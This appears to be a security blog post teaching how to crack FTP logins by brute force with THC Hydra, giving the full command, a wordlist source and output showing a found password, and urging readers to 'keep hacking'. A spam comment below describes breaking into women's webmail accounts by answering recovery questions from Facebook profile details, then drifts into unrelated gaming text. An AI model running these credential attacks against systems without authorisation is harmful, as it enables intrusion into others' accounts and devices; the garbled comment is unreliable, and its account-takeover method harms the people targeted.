Never Ending Security

It starts all here

Crack ftp passwords with thc hydra – tutorial

Brute force password cracking

Hydra is a popular password cracking tool that can be used to brute force many services to find out the login password from a given wordlist. It is included in kali linux and is in the top 10 list. On ubuntu it can be installed from the synaptic package manager.

For brute forcing hydra needs a list of passwords. There are lots of password lists available out there. In this example we are going to use the default password list provided with john the ripper which is another password cracking tool. Another password list is available at dazzlepod.

John is pre-installed on Kali linux and its password list can be found at the following location


It looks like this

#!comment: This list has been compiled by Solar Designer of Openwall Project,
#!comment: This list is based on passwords most commonly seen on a set of Unix
#!comment: systems in mid-1990's, sorted for decreasing number of occurrences
#!comment: (that is, more common passwords are listed first).  It has been
#!comment: revised to also include common website passwords from public lists
#!comment: of "top N passwords" from major community website compromises that
#!comment: occurred in 2006 through 2010.
#!comment: Last update: 2011/11/20 (3546 entries)

Create a copy of that file to your desktop or any location and remove the comment lines (all the lines above the password 123456). Now our wordlist of passwords is ready and we are going to use this to brute force an ftp server to try to crack its password.

Here is the simple command with output

root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( starting at 2013-05-13 04:32:18
[DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target - login "admin" - pass "123456" - 1 of 3546 [child 0]
[ATTEMPT] target - login "admin" - pass "12345" - 2 of 3546 [child 0]
[ATTEMPT] target - login "admin" - pass "password" - 3 of 3546 [child 0]
[21][ftp] host:   login: admin   password: password
[STATUS] attack finished for (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2013-05-13 04:32:33

Check the line “[21][ftp]”. It mentions the username/password combination that worked for the ftp server. Quite easy!
Now lets take a look at the options. The t option tells how many parallel threads hydra should create. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a shortwhile. To avoid this its better to do 1 attempt at a time. The next option is “l” which tells the username or login to use. In this case its admin. Next comes the capital “P” option which provides the wordlist to use. Hydra will pickup each line as a single password and use it.

The “v” option is for verbose and the capital “V” option is for showing every password being tried. Last comes the host/ip address followed by the service to crack.

Brute forcing is the most basic form of password cracking techniques. In works well with devices like routers etc which are mostly configured with their default passwords. However when it comes to other systems, brute forcing will not work unless you are too lucky.

However still brute forcing is a good practice for hackers so you should keep trying all techniques to hack a system. So keep hacking!!



One response to “Crack ftp passwords with thc hydra – tutorial

  1. how to hack facebook account 17 May 2015 at 12:47

    Sometimes you may forget to log out safely
    and this can be a very hard thing to do. Bronk used an obvious,
    but clever method to hack into the women’s accounts:
    since Webmail accounts have password recovery schemes that could be bypassed
    using information from Facebook profiles, such as favorite foods, high-school
    mascots, favorite colors, and so on, once he obtained that information, he would try to hack into an account.
    Call of Duty online games allow players to leap in and out of matches already in progress.

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s